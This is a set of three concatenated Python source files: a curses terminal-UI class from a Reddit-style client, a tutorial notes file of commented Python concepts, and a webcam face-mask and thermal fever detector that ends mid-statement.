if ch == self.ESCAPE:
raise exceptions.EscapeInterrupt()
if (not allow_resize) and (ch == curses.KEY_RESIZE):
raise exceptions.EscapeInterrupt()
# Fix backspace for iterm
if ch == curses.ascii.DEL:
ch = curses.KEY_BACKSPACE
return ch
# Wrapping in an exception block so that we can distinguish when the
# user hits the return character from when the user tries to back out
# of the input.
try:
out = textbox.edit(validate=validate)
if isinstance(out, six.binary_type):
out = out.decode('utf-8')
except exceptions.EscapeInterrupt:
out = None
self.curs_set(0)
return self.strip_textpad(out)
def prompt_input(self, prompt, key=False):
"""
Display a text prompt at the bottom of the screen.
Params:
prompt (string): Text prompt that will be displayed
key (bool): If true, grab a single keystroke instead of a full
string. This can be faster than pressing enter for
single key prompts (e.g. y/n?)
"""
n_rows, n_cols = self.stdscr.getmaxyx()
v_offset, h_offset = self.stdscr.getbegyx()
ch, attr = str(' '), self.attr('Prompt')
prompt = self.clean(prompt, n_cols - 1)
# Create a new window to draw the text at the bottom of the screen,
# so we can erase it when we're done.
s_row = v_offset + n_rows - 1
s_col = h_offset
prompt_win = curses.newwin(1, len(prompt) + 1, s_row, s_col)
prompt_win.bkgd(ch, attr)
self.add_line(prompt_win, prompt)
prompt_win.refresh()
# Create a separate window for text input
s_col = h_offset + len(prompt)
input_win = curses.newwin(1, n_cols - len(prompt), s_row, s_col)
input_win.bkgd(ch, attr)
input_win.refresh()
if key:
self.curs_set(1)
ch = self.getch()
# We can't convert the character to unicode, because it may return
# invalid values for keys that don't map to unicode characters,
# e.g. F1
text = ch if ch != self.ESCAPE else None
self.curs_set(0)
else:
text = self.text_input(input_win)
prompt_win.clear()
input_win.clear()
del prompt_win
del input_win
self.stdscr.touchwin()
self.stdscr.refresh()
return text
def prompt_y_or_n(self, prompt):
"""
Wrapper around prompt_input for simple yes/no queries.
"""
ch = self.prompt_input(prompt, key=True)
if ch in (ord('Y'), ord('y')):
return True
elif ch in (ord('N'), ord('n'), None):
return False
else:
self.flash()
return False
@staticmethod
def strip_textpad(text):
"""
Attempt to intelligently strip excess whitespace from the output of a
curses textpad.
"""
if text is None:
return text
# Trivial case where the textbox is only one line long.
if '\n' not in text:
return text.rstrip()
# Allow one space at the end of the line. If there is more than one
# space, assume that a newline operation was intended by the user
stack, current_line = [], ''
for line in text.split('\n'):
if line.endswith(' ') or not line:
stack.append(current_line + line.rstrip())
current_line = ''
else:
current_line += line
stack.append(current_line)
# Prune empty lines at the bottom of the textbox.
for item in stack[::-1]:
if not item:
stack.pop()
else:
break
out = '\n'.join(stack)
return out
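# Illustrative behaviour, assumed from the logic above rather than stated in
# the docs ("Terminal" stands for the enclosing class): a line that ends with
# a space is kept as an intentional line break, while lines without a
# trailing space are treated as soft wrapping and re-joined.
#
#   Terminal.strip_textpad('hello \nworld')  # -> 'hello\nworld'
#   Terminal.strip_textpad('hello\nworld')   # -> 'helloworld'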
@staticmethod
def strip_instructions(text):
"""
Remove instructional HTML comment tags inserted by TTRV.
We used to use # to annotate comments, but it conflicted with the
header tag for markdown, which some people use to format their posts.
"""
# Pattern can span multiple lines, allows dot to match newline chars
flags = re.MULTILINE | re.DOTALL
pattern = '<!--{token}(.*?){token}-->'.format(token=TOKEN)
text = re.sub(pattern, '', text, flags=flags)
return re.sub(r'\A[\s\n]*\n', '', text, flags=flags).rstrip()
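# Rough example of the intent (TOKEN is defined elsewhere in the module and
# "Terminal" stands for the enclosing class; the literal value below is only
# illustrative):
#
#   text = '<!--TOKEN Replace this text with your comment TOKEN-->\n\nHello'
#   Terminal.strip_instructions(text)  # -> 'Hello'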
def clear_screen(self):
"""
In the beginning this always called touchwin(). However, a bug
was discovered in tmux when TERM was set to `xterm-256color`, where
only part of the screen got redrawn when scrolling. tmux automatically
sets TERM to `screen-256color`, but many people choose to override
this in their tmux.conf or .bashrc file which can cause issues.
Using clearok() instead seems to fix the problem, with the trade off
of slightly more expensive screen refreshes.
Update: It was discovered that using clearok() introduced a
separate bug for urxvt users in which their screen flashed when
scrolling. Heuristics were added to make it work with as many
configurations as possible. It's still not perfect
(e.g. urxvt + xterm-256color) will screen flash, but it should
work in all cases if the user sets their TERM correctly.
Reference:
https://github.com/tildeclub/ttrv/issues/343
https://github.com/tildeclub/ttrv/issues/323
"""
if self._term != 'xterm-256color':
self.stdscr.touchwin()
else:
self.stdscr.clearok(True)
def attr(self, element):
"""
Shortcut for fetching the color + attribute code for an element.
"""
# The theme must be initialized before calling this
assert self.theme is not None
return self.theme.get(element)
@staticmethod
def check_theme(theme):
"""
Check if the given theme is compatible with the terminal
"""
terminal_colors = curses.COLORS if curses.has_colors() else 0
if theme.required_colors > terminal_colors:
return False
elif theme.required_color_pairs > curses.COLOR_PAIRS:
return False
else:
return True
def set_theme(self, theme=None):
"""
Check that the terminal supports the provided theme, and apply
the theme to the terminal if possible.
If the terminal doesn't support the theme, this falls back to the
default theme. The default theme only requires 8 colors so it
should be compatible with any terminal that supports basic colors.
"""
terminal_colors = curses.COLORS if curses.has_colors() else 0
default_theme = Theme(use_color=bool(terminal_colors))
if theme is None:
theme = default_theme
elif theme.required_color_pairs > curses.COLOR_PAIRS:
_logger.warning(
'Theme `%s` requires %s color pairs, but $TERM=%s only '
'supports %s color pairs, switching to default theme',
theme.name, theme.required_color_pairs, self._term,
curses.COLOR_PAIRS)
theme = default_theme
elif theme.required_colors > terminal_colors:
_logger.warning(
'Theme `%s` requires %s colors, but $TERM=%s only '
'supports %s colors, switching to default theme',
theme.name, theme.required_colors, self._term,
curses.COLORS)
theme = default_theme
theme.bind_curses()
self.theme = theme
# Apply the default color to the whole screen
self.stdscr.bkgd(str(' '), self.attr('Normal'))
|
concepts_and_terms.py
|
"""
Time stuff
"""
# import time
#
# t1 = time.perf_counter_ns()
# # do things
# t2 = time.perf_counter_ns()
# print(t2 - t1)
"""
Idempotence
f(f(x)) = f(x)
Applying an idempotent operation repeatedly has the same effect as applying it once.
GET
PUT
DELETE
are idempotent.
POST is NOT idempotent (the response can change on repeated tries).
"""
#
# print(abs(abs(-10))) # Will always be 10
#
"""
Closures
"A closure is an inner function that remembers and has access to variables in
the local scope in which it was created.
"""
# def closure():
# count = 0
#
# def inner():
# nonlocal count
# count += 1
# print(count)
#
# return inner
#
#
# start = closure()
# start()
# start()
# start()
#
"""
Memoization: storing the result of a function so it does not need to be re-run
if the same inputs are seen again.
"""
# import time
#
# ef_cache = {}
#
#
# def expensive_func(num):
# if num in ef_cache:
# return ef_cache[num]
#
# print(f"Computing {num}")
# time.sleep(1)
# result = num * num
# ef_cache[num] = result
# return num * num
#
#
# result = expensive_func(4)
# print(result)
#
# result = expensive_func(10)
# print(result)
#
# result = expensive_func(4)
# print(result)
#
# result = expensive_func(10)
# print(result)
#
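# The standard library provides the same idea out of the box; a minimal sketch
# using functools.lru_cache, equivalent in spirit to the manual cache above:
#
# from functools import lru_cache
#
#
# @lru_cache(maxsize=None)
# def expensive_func_cached(num):
#     print(f"Computing {num}")
#     return num * num
#
#
# expensive_func_cached(4)  # computes and prints
# expensive_func_cached(4)  # served from the cache, nothing is printed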
"""
Ternary Conditional
"""
# # condition = False
# # x = 1 if condition else 0
#
"""
formatting large numbers.
2_000_000 # Adding underscores does not affect numbers in Python!
"""
# num1 = 10_000_000_000
# num2 = 100_000_000
# total = num1 + num2
#
# print(f"{total:,}")
#
"""
iterate over two lists at once!
"""
# names = [""]
#
#
# def fibonacci_generator(num):
# a, b = 0, 1
# for i in range(0, num):
# yield a
# a, b = b, a + b
#
#
# fib_gen = fibonacci_generator(10)
#
#
# def test_fibonacci_generator(fib_gen):
# first_ten = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]
# for fib, num in zip(fib_gen, first_ten):
# assert fib == num
#
#
"""
Tuple unpacking
"""
# # set 'a' and 'b' to 1, 2 and c to everything up to the last one [3, 4] d to 5
# a, b, *c, d = (1, 2, 3, 4, 5)
# print(a, b, c, d)
# # Ignore the rest of the arguments completely
# a, b, *_ = (1, 2, 3, 4, 5)
# print(a, b)
#
"""
Being 'Pythonic'... EAFP (Easier to Ask Forgiveness than Permission):
'Try to do something, and if it doesn't work, handle the error.'
vs
LBYL (Look Before You Leap):
'Ask permission before every step you take.'
EAFP can be faster when errors are rare, because you don't have to keep
querying the object with checks before proceeding.
"""
#
#
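# A tiny EAFP vs LBYL sketch with dictionary access, separate from the duck
# typing example below:
#
# d = {"a": 1}
#
# # LBYL: check first, then act
# value = d["a"] if "a" in d else None
#
# # EAFP: act first, handle the failure
# try:
#     value = d["a"]
# except KeyError:
#     value = None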
class Person:
def quack(self):
print("Quack, quack!")
def walk(self):
print("Waddle, Waddle!")
class Duck:
def quack(self):
print("Quack, quack!")
def walk(self):
print("Waddle, Waddle!")
# Pythonic
def is_a_duck_pythonic(thing):
try:
thing.quack()
thing.walk()
print("I think this is a Duck!")
except AttributeError as e:
print(e)
print("I don't think this is a duck!")
#
#
# # Non-Pythonic
def is_a_duck(thing):
if hasattr(thing, "quack"):
if callable(thing.quack):
thing.quack()
if hasattr(thing, "walk"):
if callable(thing.walk):
thing.walk()
print("I think this is a Duck!")
#
# else:
# print("I don't think this is a duck!")
#
#
"""
How being more Pythonic can avoid race conditions
"""
# import os
#
# my_file = "file.txt"
#
# if os.access(my_file, os.R_OK):
# # Race condition could happen here if something happens to the file before
# # Python is able to open it.
# with open(my_file) as f:
# print(f.read())
# else:
# print("File could not be accessed")
#
# # Non-Race condition
# try:
# f = open(my_file)
# except IOError as e:
# print("File could not be accessed")
# else:
# with f:
# print(f.read())
"""
Async Tasks
"""
# import time
# import asyncio
# def print_something(something):
# time.sleep(0.1)
# print(something)
#
#
# async def print_something_2(something):
# time.sleep(0.1)
# print(something)
#
#
# async def main(loop):
# colors = [
# "Black",
# "Yellow",
# "Green",
# "Red",
# "Blue",
# "Beige",
# "Orange",
# "Burgundy",
# "Pink",
# "Brown",
# ]
# for color in colors:
# loop.create_task(print_something_2(color))
#
# # await asyncio.wait()
#
#
# START_TIME = time.perf_counter()  # time.clock() was removed in Python 3.8
# LOOP = asyncio.get_event_loop()
# try:
# LOOP.run_until_complete(main(LOOP))
# except Exception as e:
# pass
# finally:
# LOOP.close()
# print(f"I took {time.clock() - START_TIME} seconds to complete")
"""
Multiprocessing
"""
# import time
# from multiprocessing import Process, Queue, Pool, cpu_count
# import time
# def print_something(something):
# time.sleep(1)
# print(something)
#
#
# def multiprocess_list(items):
# processes = []
#
# for item in items:
# proc = Process(target=print_something, args=(item,))
# processes.append(proc)
# proc.start()
#
# for proc in processes:
# proc.join()
#
#
# def multiprocess_tasks(tasks, number_of_processes):
# tasks_to_accomplish = Queue()
# processes = []
#
# for task in tasks:
# tasks_to_accomplish.put(task)
#
# for i in range(number_of_processes):
# while not tasks_to_accomplish.empty():
# p = Process(target=print_something, args=(tasks_to_accomplish.get(),))
# processes.append(p)
# p.start()
#
# for p in processes:
# p.join()
#
#
# def pool_tasks(tasks, number_of_processes):
# p = Pool(number_of_processes)
# p.map(print_something, tasks)
#
#
# COLORS = [
# "Black",
# "Yellow",
# "Green",
# "Red",
# "Blue",
# "Beige",
# "Orange",
# "Burgundy",
# "Pink",
# "Brown",
# ]
#
# START_TIME = time.time()
# for COLOR in COLORS:
# print_something(COLOR)
# # Method 1
# multiprocess_list(COLORS) # 1.5 seconds
#
# # Method 2
# multiprocess_tasks(COLORS, cpu_count()) # 1.67 seconds
#
# # Method 3
# pool_tasks(COLORS, cpu_count()) # 3.2 seconds
#
# # No multiprocessing 10 seconds
# for COLOR in COLORS:
# print_something(COLOR)
#
# print(f"I took {time.time() - START_TIME} seconds to complete")
"""
Python Logging
"""
# import logging
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG) # stream_handler will use this level
#
# formatter = logging.Formatter("%(asctime)s:%(levelname)s:%(name)s:%(message)s")
#
# file_handler = logging.FileHandler("sample.log")
# file_handler.setLevel(logging.ERROR) # Only write ERRORS to the sample.log
# file_handler.setFormatter(formatter)
#
# stream_handler = logging.StreamHandler()
# stream_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
# logger.addHandler(stream_handler)
#
#
# def divide(x, y):
# try:
# return x / y
# except ZeroDivisionError:
# logger.exception("Tried to divide by zero")
#
#
# num_1 = 20
# num_2 = 0
#
# divide_result = divide(20, 0)
# logger.debug(f"Divide: {num_1} + {num_2} = {divide_result}")
"""
What is an iterable, iterator, and a generator? Oh My!
Q: Is a List an iterator?
A: It is iterable, but it is NOT an iterator.
Q: So what does it mean that something is 'iterable?'
A: Something that is iterable is something that can be 'looped' over. These include strings, lists, dictionaries,
tuples, files, generators, etc. The object needs to be able to return an iterator object from its dunder __iter__
method. The iterator object returned must define a __next__ method.
Q: How do we know that something is iterable?
A: It needs to have dunder (magic) method __iter__
A: When you are using a for loop over an object, you are calling its __iter__ method.
Q: So what is an iterator?
A: An iterator is an object with a state so that it remembers where it is during iteration.
Q: How does an iterator get its next value?
A: An iterator gets its next value through the __next__ method.
A: One of the reasons a list is not an iterator is that it does not have a __next__ method.
Q: What's the difference between a function and a generator?
A: A generator yields values whereas a function returns values. A generator also maintains state.
"""
# tmp_list = [1, 2, 3]
# iter_list = tmp_list.__iter__()
# iter_list_2 = iter(tmp_list)
# assert type(iter_list) == type(iter_list_2) # Both are iterators
#
# # Custom implementation of a for loop
# tmp_list = [1, 2, 3]
# iter_list = iter(tmp_list)
# while True:
# try:
# item = next(iter_list)
# print(item)
# except StopIteration:
# break
#
# # Custom implementation of the range() function using an iterator class (a generator version follows below)
# class MyRange:
# def __init__(self, start, end):
# self.value = start
# self.end = end
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.value >= self.end:
# raise StopIteration
# current = self.value
# self.value += 1
# return current
#
# nums = MyRange(1, 10)
# for num in nums:
# print(num)
#
# nums_2 = MyRange(1, 10)
# print(next(nums_2))
# print(next(nums_2))
# print(next(nums_2))
# print(next(nums_2))
# def my_range(start, end):
# current = start
# while current < end:
# yield current
# current += 1
#
#
# nums = my_range(1, 10)
# for i in range(9):
# print(next(nums))
"""
Itertools
"""
# # Counter
# import itertools
# counter = itertools.count(start=1, step=1)
#
# data = ["Mark", "Ashley", "Christine", "John", "Holiday"]
# combined = list(
# zip(counter, data)
# ) # zip pairs iterables together, limited by the shortest one.
# print(combined)
# # Cycle
# cycle_counter = itertools.cycle(("On", "Off")) # Good for simulating a switch. Takes a tuple and repeats it.
# for _ in range(6):
# print(next(cycle_counter))
# # Repeat
# squares = map(pow, range(10), itertools.repeat(2))  # pow(x, 2) == x**2 for each x in range(10)
# print(list(squares))
# # Starmap
# squares = itertools.starmap(
# pow, [(0, 2), (1, 2), (2, 2)]
# ) # like map(), but takes sets of tuples
# print(list(squares))
# # Combinations and Permutations
# # With combinations, order does not matter, in permutations, they do.
# import time
# letters = ["a", "b", "c"]
# numbers = [1, 2, 3]
# names = ["John", "Ashley"]
# combinations = itertools.combinations(letters, 2)
# permutations = itertools.permutations(letters, 2)
# itertools.combinations(letters, 2)
# itertools.permutations(letters, 2)
# list_generator = itertools.chain(letters, numbers, names)
# # islice
# test_gen = (a for a in range(101))
# slice_of_generator = itertools.islice(
# test_gen, 90, 101, 2
# ) # (iterator, start, stop, step)
# print(list(slice_of_generator)) # [90, 92, 94, 96, 98, 100]
# # Filtering and Compression
# import string
#
#
# def lt_2(n):
# if n < 2:
# return True
# return False
#
#
# alphabet_list = list(string.ascii_lowercase)
# numbers = range(10)
# names = ["Solly", "Holiday"]
#
# selectors = itertools.cycle((True, False))
#
# filter_result = filter(lt_2, numbers)
# print(list(filter_result)) # [0, 1]
#
# flip_filter_result = itertools.filterfalse(lt_2, numbers)
# print(list(flip_filter_result)) # [2, 3, 4, 5, 6, 7, 8, 9]
#
# compression_result = itertools.compress(alphabet_list, selectors)
# print(
# list(compression_result)
# ) # ['a', 'c', 'e', 'g', 'i', 'k', 'm', 'o', 'q', 's', 'u', 'w', 'y']
#
# drop_until_true = itertools.dropwhile(
# lt_2, numbers
# ) # drop items while the predicate is True, then return the rest (starting at the first False)
# print(list(drop_until_true)) # [2, 3, 4, 5, 6, 7, 8, 9]
#
# take_while_true = itertools.takewhile(
# lt_2, numbers
# ) # return nums until False, then yeet the F out.
# print(list(take_while_true)) # [0, 1]
# # Accumulate
# numbers = range(10)
# acc_result = itertools.accumulate(numbers) # running totals of the numbers
# print(list(acc_result)) # [0, 1, 3, 6, 10, 15, 21, 28, 36, 45]
# # Groupby (REQUIRES ITERABLE TO ALREADY BE SORTED!!!!)
# def get_state(person):
# return person["state"]
#
#
# people = [
# {"name": "John Doe", "city": "Gotham", "state": "NY"},
# {"name": "Jane Doe", "city": "Kings Landing", "state": "NY"},
# {"name": "Corey Schafer", "city": "Boulder", "state": "CO"},
# {"name": "Al Einstein", "city": "Denver", "state": "CO"},
# {"name": "John Henry", "city": "Hinton", "state": "WV"},
# {"name": "Randy Moss", "city": "Rand", "state": "WV"},
# {"name": "Nicole K", "city": "Asheville", "state": "NC"},
# {"name": "Jim Doe", "city": "Charlotte", "state": "NC"},
# {"name": "Jane Taylor", "city": "Faketown", "state": "NC"},
# ]
#
# person_group = itertools.groupby(people, get_state)
# for key, group in person_group:
# print(key)
# for person in group:
# print(person)
# copy1, copy2 = itertools.tee(person_group) # create two copies of an iterator
"""
Calling external programs in Python
"""
# import subprocess
# subprocess.run("ls") # single command
# subprocess.run(
# "ls -la", shell=True
# ) # You can use shell=True to run a full shell command string, but this is not safe
# subprocess.run(["ls", "-la"]) # passing in commands with a list is safer.
#
# # capture output
# output = subprocess.run(
# ["ls", "-la"], capture_output=True, text=True
# ) # text=true returns a string instead of bytes
# print(output)
# # redirecting output to a file
# with open("output.txt", "w") as writer_obj:
# output = subprocess.run(
# ["ls", "-la"], stdout=writer_obj, text=True, check=True
# ) # check=true throws an error in Python if it fails
# # Error handling
# output = subprocess.run(["ls", "-la", "blablah"], capture_output=True, text=True)
# if output.returncode != 0: # There was an error
# print(output.stderr)
# else:
# with open("output.txt", "w") as writer_obj:
# writer_obj.write(output)
# # Re-direct output to the void
# subprocess.run(["ls", "-la", "blablah"], stderr=subprocess.DEVNULL)
# # Pipe commands | !
# def get_file_line_count_bash(file_path):
# line_count = subprocess.run(
# [f"cat {file_path} | wc -l"], capture_output=True, text=True, shell=True
# )
# return int(line_count.stdout.strip())
"""
requests with HTTPbin
"""
# import requests
#
# # GET
# payload = {"page": 2, "count": 25}
# r = requests.get("https://httpbin.org/get", params=payload)
#
# # POST
# payload = {"username": "John", "password": "testing123"}
# r = requests.post("https://httpbin.org/post", data=payload)
# r_dict = r.json()
#
# # Basic Auth
# r = requests.get(
# "https://httpbin.org/basic-auth/john/testing123", auth=("john", "testing123")
# )
# print(r.text)
"""
Python Sorting Algorithms
"""
# def bubble_sort(arr):
# n = len(arr)
#
# for u in range(n):
# for v in range(0, n - u - 1):
# if arr[v] > arr[v + 1]:
# arr[v], arr[v + 1] = arr[v + 1], arr[v]
# return arr
#
#
# def selection_sort(arr):
# indexing_length = range(0, len(arr) - 1)
#
# for i in indexing_length:
# min_value = i
#
# for j in range(i + 1, len(arr)):
# if arr[j] < arr[min_value]:
# min_value = j
#
# if min_value != i:
# arr[min_value], arr[i] = arr[i], arr[min_value]
#
# return arr
#
#
# print(selection_sort([1, 6, 3, 6, 3, 8, 23, 4, 2, 1, 7]))
|
detector.py
|
"""
The detector.py file is used to determine whether a person is wearing a mask or not.
It uses the detect_and_predict_mask function, which takes in a single frame from the
live stream, a face_net used to detect faces in the frame, and a mask_net used to
determine whether the detected faces are wearing masks. mask_net is a pre-trained
model that has been trained using learning_algo.py. When the algorithm is run it
starts a live stream and uses every frame to determine whether the person in that
frame is wearing a mask. It displays a green box around the face if the person is
wearing a mask and a red one if they are not.
The -f or --face flag can be used to provide the path to the face detector model
directory; it only needs to be used if another model should be used to detect faces
in a frame. The -m or --model flag can be used to provide a path to the pre-trained
mask detection model. The -c or --confidence flag can be used to provide an optional
probability threshold that overrides the default 50% used to filter weak face detections.
"""
# import the necessary packages
import argparse
import os
import subprocess
import signal
import multiprocessing
import sys
from sys import platform
import cv2
import tensorflow as tf
import numpy as np
from screeninfo import get_monitors
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
# Returns visible faces and their facemask predictions.
def detect_and_predict_mask(frame, face_net, mask_net, confidence_arg, shared_dict):
# Grab the dimensions of the frame and then construct a blob from it
(H, W) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (300, 300),(104.0, 177.0, 123.0))
# Pass the blob through the network and obtain the face detections
face_net.setInput(blob)
detections = face_net.forward()
# Initialize our list of faces, their corresponding locations, and the list of predictions from our face mask network
faces = []
locs = []
preds = []
# loop over the detections
for i in range(0, detections.shape[2]):
# Extract the confidence (i.e., probability) associated with the detection
confidence = detections[0, 0, i, 2]
# Filter out weak detections by ensuring the confidence is greater than the minimum confidence
if confidence > confidence_arg:
# Compute the (x, y)-coordinates of the bounding box for the object
box = detections[0, 0, i, 3:7] * np.array([W, H, W, H])
(start_x, start_y, end_x, end_y) = box.astype("int")
# Wider margin for face
(start_x, start_y, end_x, end_y) = (int(start_x*0.95), int(start_y*0.95), int(end_x*1.05), int(end_y*1.05))
# Ensure the bounding boxes fall within the dimensions of the frame
(start_x, start_y) = (max(0, start_x), max(0, start_y))
(end_x, end_y) = (min(W - 1, end_x), min(H - 1, end_y))
# Extract the face ROI, convert it from BGR to RGB channel ordering, resize it to 224x224, and preprocess it
face = frame[start_y:end_y, start_x:end_x]
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
# Add the face and bounding boxes to their respective lists
faces.append(face)
locs.append((start_x, start_y, end_x, end_y))
# Only make predictions if at least one face was detected
if len(faces) > 0:
# for faster inference we'll make batch predictions on *all*
# faces at the same time rather than one-by-one predictions
# in the above `for` loop
faces = np.array(faces, dtype="float32")
preds = mask_net.predict(faces, batch_size=32)
shared_dict['facemask_detector_status'] = True
# Return a 2-tuple of the face locations and their corresponding predictions
return (locs, preds)
# Parses the thermal grabber program's STDOUT as thermal data and debug information.
def thermal_grabber_worker(shared_dict, thermal_program_path, FLIP_THERMAL):
# Opens a subprocess to the thermal grabber
thermal_grabber = subprocess.Popen(["./thermal_grabber"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=thermal_program_path, bufsize=1)
concat_data = ""
for line in iter(thermal_grabber.stdout.readline, b''):
# Allow the C++ program to handle its termination
if shared_dict['thermal_process_terminate']:
thermal_grabber.send_signal(signal.SIGINT)
break
# The following statements parse the raw STDOUT data as a numpy array.
data = line.decode("utf-8").rstrip()
if data == "":
continue
if data[0] == "[" and data[-1] == ";":
shared_dict['resync_count'] = 0
concat_data = data[1:-1] + ", "
elif data[-1] == ";":
shared_dict['resync_count'] = 0
concat_data = concat_data + data[:-1] + ", "
elif data[-1] == "]" and concat_data != "":
shared_dict['resync_count'] = 0
concat_data = concat_data + data[:-1]
try:
data_array = np.fromstring(concat_data, np.uint16, sep=',')
except:
if debug:
print("[WARNING] Received invalid thermal array (np.fromstring)")
concat_data = ""
continue
if data_array.size != 19200:
if debug:
print("[WARNING] Received invalid size of thermal array: " + str(data_array.size) + " != 19200")
concat_data = ""
continue
thermal_data = np.reshape(data_array, (120,160))
if FLIP_THERMAL:
thermal_data = cv2.rotate(thermal_data, cv2.ROTATE_180)
shared_dict['thermal_data'] = thermal_data
# Create a copy of the thermal data to process as a thermal image frame
thermal_frame = thermal_data.copy()
# Resize thermal image for output
cv2.normalize(thermal_frame, thermal_frame, 0, 255, cv2.NORM_MINMAX)
thermal_width = int(thermal_frame.shape[1] * THERMAL_SCALE_FACTOR)
thermal_height = int(thermal_frame.shape[0] * THERMAL_SCALE_FACTOR)
thermal_dim = (thermal_width, thermal_height)
thermal_frame = cv2.resize(thermal_frame, thermal_dim, interpolation = cv2.INTER_AREA)
thermal_frame = cv2.cvtColor(thermal_frame,cv2.COLOR_GRAY2RGB)
thermal_frame = np.uint8(thermal_frame)
shared_dict['thermal_frame'] = thermal_frame
concat_data = ""
elif "," in data:
shared_dict['resync_count'] = 0
if data[-1] != ",":
concat_data = concat_data + data + ","
else:
concat_data = concat_data + data
elif "RESYNC" in data:
concat_data = ""
shared_dict['resync_count'] += 1
print(data)
else:
concat_data = ""
shared_dict['resync_count'] = 0
print(data)
print("[INFO] Thermal subprocess closed.")
def facemask_worker(shared_dict, face_arg, mask_arg, confidence_arg):
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
try:
# Allow GPU memory usage to change automatically
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
logical_gpus = tf.config.experimental.list_logical_devices('GPU')
print(len(gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
except RuntimeError as e:
# Memory growth must be set before GPUs have been initialized
print(e)
# Load our serialized face detector model from disk
print("[INFO] loading face detector model...")
prototxt_path = os.path.sep.join([face_arg, "deploy.prototxt"])
weights_path = os.path.sep.join([face_arg, "res10_300x300_ssd_iter_140000.caffemodel"])
face_net = cv2.dnn.readNet(prototxt_path, weights_path)
# Load the face mask detector model from disk
print("[INFO] loading face mask detector model...")
mask_net = load_model(mask_arg)
print("[INFO] face mask detector model loaded.")
while True:
if shared_dict['frame'] is not None:
shared_dict['locs'], shared_dict['preds'] = detect_and_predict_mask(shared_dict['frame'], face_net, mask_net, confidence_arg, shared_dict)
if __name__ == '__main__':
# Construct the argument parser and parse the arguments
MAIN_DIR = os.getcwd()
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--face", type=str,
default="face_detector",
help="Path to face detector model directory")
ap.add_argument("-m", "--model", type=str,
default="mask_detector.model",
help="Path to trained face mask detector model")
ap.add_argument("-c", "--confidence", type=float, default=0.5,
help="Minimum probability to filter weak detections")
# Thermal mode switch
ap.add_argument("-t", "--thermal", dest="thermal", action="store_true", help="Activate thermal mode")
# Thermal overlay switch
ap.add_argument("-to", "--thermaloverlay", dest="thermaloverlay", action="store_true", help ="Display thermal overlay")
# Debug mode switch
ap.add_argument("-d", "--debug", dest="debug", action="store_true", help ="Activate debug mode")
# Flip thermal switch
ap.add_argument("-ft", "--flipthermal", dest="flipthermal", action="store_true", help ="Flip thermal image 108 degrees")
# Use temperature offset config file
ap.add_argument("-uo", "--useoffset", dest="useoffset", action="store_true", help ="Use offset configuration file")
# Fullscreen switch
ap.add_argument("-fs", "--fullscreen", dest="fullscreen", action="store_true", help ="Use fullscreen mode")
ap.set_defaults(thermal=False, debug=False, flipthermal=False, useoffset=False, fullscreen=False)
# Thermal program path setup
thermal_program_path = os.path.join(MAIN_DIR, "thermal_grabber/build/thermal_grabber")
ap.add_argument("-tp", "--thermalprogram", type=str, default=thermal_program_path, help="Thermal program path")
args = vars(ap.parse_args())
debug = args["debug"]
if platform == "linux":
# FR:30Hz dFoV:78° Logitech C920
webcam_cap = cv2.VideoCapture(0, cv2.CAP_V4L2)
W, H = 800, 600
webcam_cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'))
webcam_cap.set(cv2.CAP_PROP_FRAME_WIDTH, W)
webcam_cap.set(cv2.CAP_PROP_FRAME_HEIGHT, H)
webcam_cap.set(cv2.CAP_PROP_FPS, 30)
else:
webcam_cap = cv2.VideoCapture(0)
W, H = 1920, 1080
webcam_cap.set(cv2.CAP_PROP_FRAME_WIDTH, W)
webcam_cap.set(cv2.CAP_PROP_FRAME_HEIGHT, H)
# Fullscreen setup
fullscreen_mode = args["fullscreen"]
MONITOR_INFO = get_monitors()[0]
print("[INFO] Fullscreen mode: " + str(fullscreen_mode))
# Display video stream info
print("[INFO] starting video stream...")
print("[INFO] Video stream active: " + str(webcam_cap.isOpened()))
# GUI constants
# Facemask confidence level minimum
FACEMASK_CONFIDENCE = 0.80
GUI_FONT = cv2.FONT_HERSHEY_DUPLEX
TEXT_SCALE = 1
SUCCESS_COLOUR = (0, 255, 0) # Green
WARNING_COLOUR = (0, 0, 255) # Red
COLD_COLOUR = (255, 0, 9) # Blue
UNKNOWN_COLOUR = (128, 128, 128) # Grey
# Multiprocessing setup
manager = multiprocessing.Manager()
shared_dict = manager.dict()
shared_dict['facemask_detector_status'] = False
shared_dict['frame'] = None
shared_dict['locs'] = []
shared_dict['preds'] = []
shared_dict['thermal_process_terminate'] = False
shared_dict['resync_count'] = 0
# Thermal program setup
THERMAL_MODE = args['thermal']
thermal_program_path = args["thermalprogram"]
# Thermal constant values
# Based on temperature range from Lepton on HIGH gain mode [0-150°C]
THERMAL_CONVERSION = 0.0092
TEMP_MINIMUM = 32
TEMP_MAXIMUM = 42
TEMP_FEVER = 38
THERMAL_SCALE_FACTOR = 5
FLIP_THERMAL = args['flipthermal']
temp_offset = 0
# Copy of the original offset so we can reset it using the 'r' key later.
TEMP_OFFSET_ORG = temp_offset
# Get thermal settings from arguments
thermal_overlay = args['thermaloverlay']
USE_OFFSET = args['useoffset']
# Check that thermal grabber program is present in the specified directory.
# Check that the temperature offset configuration file is available if it is required.
if THERMAL_MODE:
print("[INFO] Thermal mode: ON")
print("[INFO] Checking thermal program path...")
if not os.path.exists(thermal_program_path):
print("[ERROR] Provided thermal program path does not exist: " + thermal_program_path)
sys.exit(1)
else:
print("[SUCCESS] Provided thermal program path exists.")
if USE_OFFSET:
print("[INFO] Getting temperature offset...")
try:
with open("TEMP_OFFSET.dat", "r") as offset_file:
temp_offset = float(offset_file.readline().strip())
TEMP_OFFSET_ORG = temp_offset
print("[SUCCESS] Thermal offset set: " + str(temp_offset))
except Exception as e:
print("[WARNING] There was an error retrieving your offset from TEMP_OFFSET", e)
else:
